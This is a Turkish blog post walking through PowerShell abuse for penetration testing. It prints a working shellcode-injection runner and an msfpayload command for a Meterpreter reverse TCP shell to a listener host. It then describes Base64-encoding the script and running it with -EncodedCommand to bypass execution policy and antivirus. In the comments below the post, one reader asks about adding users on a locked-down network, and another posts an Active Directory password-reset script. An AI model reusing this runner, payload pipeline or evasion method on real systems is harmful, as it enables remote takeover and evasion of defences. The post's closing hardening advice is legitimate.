Komut Satırının Gücü Adına!

Yapılan istatistiklere göre 2011 yılının son çeyreğinde Windows XP işletim sistemi ile Windows 7 işletim sistemi arasındaki kullanım oranları birbirine oldukça yakınken, 2012 yılının son çeyreğinde Windows 7 işletim sistemi kullanım oranının Windows XP işletim sistemi kullanım oranını ikiye katlamış olması, penetrasyon testi/sızma testi gerçekleştiren bilişim güvenliği uzmanları arasında tek bir nedenden ötürü memnuniyetle karşılandı o da Windows 7 ile yüklü gelen Powershell’den başkası değildi.

Powershell, Mircosoft tarafından yönetim görevlerini otomatize etmek amacıyla geliştirilmiş, .NET sınıflarından faydalanarak betikler (script) geliştirilmesine imkan tanıyan yeni nesil komut satırıdır. İlk sürümü 2006 yılında Microsoft tarafından yayınlanan Powershell’in ikinci sürümü 2009 yılında Windows 7 ve Windows 2008 işletim sistemlerine entegre edilmiş üçüncü sürümü ise Windows 8 ve Windows Server 2012 işletim sistemlerine entegre edilerek kullanıcıların kullanımına sunulmuştur.

Powershell, güvenlik önlemi adına güvenilir kaynaklar tarafından geliştirilmemiş olan betiklerin çalıştırılmasına varsayılan (default) olarak izin vermez. Kurumsal ortamlarda da daha önce Powershell’in gücüne tanıklık etmiş olan Sistem Yöneticileri çoğunlukla Etki Alanı Denetleyicisi (DC) üzerinden Powershell’in güvenilir olmayan kaynaklardan indirilen betiklerin çalıştırılmasını yasaklamaktadırlar.

Powershell

Ancak ve ancak sistem yöneticileri de dahil çoğu son kullanıcı bu betiklerin Command ve EncodedCommand (Base64 ile kodlanmış (encode) betik) ile de çalıştırıldığından haberdar değildir. Normal şartlarda betik çalıştırmaya izin vermeyen politikalar Command ve EncodedCommand ile atlatılabilmektedir.

Powershell

Powershell’in betiklerde .NET sınıflarını kullanmaya imkan tanıması, C# ile yazılmış bir kod parçasını çalıştırma (runtime) esnasında derlemesi ve çalıştırması sayesinde örneğin komut enjeksiyonu (command injection) zafiyeti olan bir Windows Server 2008 işletim sisteminin komut satırına uzaktan erişmek (remote shell) veya basit şifre tahmini ile sızılan bir Windows 7 işletim sisteminin Metasploit’e bağlanmasını sağlamak mümkündür. En önemlisi ise Powershell sayesinde Antivirüs yazılımının kullanıldığı bir sistemde Antivirüs’e yakalanmadan istenilen kabuk kodu çalıştırabilmektedir.

Örnek olarak Powershell üzerinden kabuk kodu çalıştırmak için Matt Graeber tarafından geliştirilen aşağıdaki betiği kullanabilirsiniz.


$code = {$code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc64 = ;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.Length -gt 0x1000) {$size = $sc.Length};$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };}

Betiğin çalışabilmesi için $sc64 değişkenine hedef işlemci mimarisine uygun olan (x32 veya x64) kabuk kodunu kopyalamanız gerekmektedir. $sc64 değişkenine atanacak kabuk kodunu aşağıdaki şekilde oluşturabilirsiniz.


msfpayload windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.128 PORT=4444 EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- | sed 's/^[^0]*\(0.*\/\*\).*/\1/' | sed 's/.\{2\}$//' | tr -d '\n' | more

Powershell

Ardından betik bloğunu Powershell komut satırına kopyaladıktan sonra Base64 ile kodlamak için [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($code)) kodunu çalıştırmanız gerekmektedir. Son olarak Backtrack’de hazır bulunan Meterpreter ile hedef sistemi bağlamak için az önce elde ettiğiniz BASE64 ile kodlanmış betiği hedef sistemde powershell -EncodedCommand şeklinde çalıştırarak Meterpreter’ın Antivirüs yüklü hedef sistemde başarıyla çalışmasını sağlayabilirsiniz.

Powershell

Sonuç olarak Powershell üstün özelliklerinin yanı sıra mevcut güvenlik kontrollerinin yetersiz olması nedeniyle kötüye kullanıma açık olduğu için kullanımına ihtiyaç duyulmayan sistemlerden kaldırılmasını tavsiye ederim.

Bir sonraki yazıda görüşmek dileğiyle herkese güvenli günler dilerim.

image_pdfShow this post in PDF formatimage_printPrint this page
4 comments
 1. Merhaba şimdi biz bununla dosya çalıştırılması yasaklanmış,komutları kısıtlanmış bir networkte ,ana makineye kullanıcı eklemek için kullanabilirmiyiz çalışırmı komut?

  1. Sonucun neyin ne kadar kısıtlandığına göre değişmesinden ötürü bilmeden, görmeden, denemeden söylenenler yerinde olmaz tavsiyem ilk olarak powershell’in komut satırına erişmeyi denemeniz olacaktır.

 2. Kimi zaman yeni kullanıcı kimi zaman mevcut kullanıcı üzerinde yapılan değişiklikler de amaca hizmet eder.

  Set-AdUserPwd.ps1

  Function Set-AdUserPwd
  {
  Param(
  [string]$user,
  [string]$pwd
  ) #end param
  $oUser = [adsi]“LDAP://$user”
  $ouser.psbase.invoke(“SetPassword”,$pwd)
  $ouser.psbase.CommitChanges()
  } # end function Set-AdUserPwd
  Set-AdUserPwd -user “cn=bob,ou=HSG_TestOU,dc=nwtraders,dc=com” -pwd P@ssword1

 3. Nihayetinde bahseddiğiniz base65 encoding yöntemi web uygulamaları için de kullanılıyor ve buna az da olsa benzer bir uygulamayla orda da karşılaşılabiliyor. Böylesien büyük şirketlerin yazılımlarında atladığı bu şeyler isimlerine leke getirebiliyor.

Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like
Read More

e-Devlet Hacklendi mi?

If you are looking for an English version of this article, please visit here. Öncelikle yazının sonunda söyleyeceğimi başta söyleyeyim, “Hayır, hack-len-me-di!” Peki bu durumda vatandaş olarak rahat bir nefes alabilir misiniz ? Maalesef hayır. Bunun sebebini de yazının devamında okuyabilirsiniz. Zaman zaman hortlayan “e-Devlet Hacklendi!”, “e-Devlet verileri çalındı!”, “85…
Read More
Read More

WhatsApp Dolandırıcıları

If you are looking for an English version of this article, please visit here. Başlangıç Son günlerde hemen hemen WhatsApp uygulaması kullanan herkesi rahatsız eden yabancı cep telefonu numaralarından gelen çağrılardan, mesajlardan ben de yakın zamanda nasibimi aldım ve tabii ki diğer dolandırıcılıklarla ilgili yazılarımda (Kripto Para Dolandırıcıları, LinkedIn Dolandırıcıları,…
Read More
Read More

LinkedIn Dolandırıcıları

If you are looking for an English version of this article, please visit here. Uzun yıllardan beri sosyal ağları ve medyayı etkin kullanan bir siber güvenlik araştırmacısı olarak bağlantılarım arasında yer alanlarınız özellikle hafta içi LinkedIn ve Twitter üzerinden okuduğum ve beğendiğim siber güvenlik makalelerini, haberleri paylaştıklarımı farkediyorlardır. Twitter hesabımın…
Read More
Read More

e-Devlet Hesaplarımızı Nasıl Hackliyorlar?

If you are looking for an English version of this article, please visit here. Başlangıç 25 Ekim 2023 günü saat 11:46’da e-Devlet uygulamasından ve e-posta adresime gelen uyarılardan e-Devlet Kapısı hesabıma üst üste birden fazla defa yanlış parola ile giriş yapılmaya çalışıldığı için hesabımın bir saatliğine geçici olarak kullanıma kapatıldığını…
Read More